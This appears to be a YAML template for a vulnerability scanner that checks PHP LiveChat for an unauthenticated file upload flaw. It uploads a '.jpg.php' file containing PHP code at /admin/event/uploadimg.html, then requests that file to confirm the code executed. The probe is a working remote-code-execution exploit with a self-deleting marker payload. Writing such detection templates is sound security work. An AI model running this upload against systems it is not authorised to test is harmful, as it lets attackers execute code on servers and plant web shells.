id: php-livechat-uploadimg-html-upload

info:
  name: PHP LiveChat Upload
  author: xpoc
  severity: critical
  verified: false
  reference:
    - https://mp.weixin.qq.com/s/-LnDOjoqYMjtjoVV9l-EuA
  created: 2023/06/22

set:
    f1: randomInt(40000, 44800)
    rboundary: randomLowercase(8)
    randname: randomLowercase(6)
rules:
    r0:
        request:
            method: GET
            path: /admin/event/uploadimg.html
        expression: response.status == 500 && response.body.bcontains(b"editormd-image-file")
    r1:
        request:
            method: POST
            path: /admin/event/uploadimg.html
            headers:
                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{randname}}.jpg.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo md5({{f1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
        expression: response.status == 200 && response.body.bcontains(b".php")
        output:
            search: '"url\":\"(?P<dir>.+?)\"".bsubmatch(response.body)'
            dir: replaceAll(search["dir"], "\\", "")
    r2:
        request:
            method: GET
            path: /{{dir}}
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(f1))))
expression: r0() && r1() && r2()
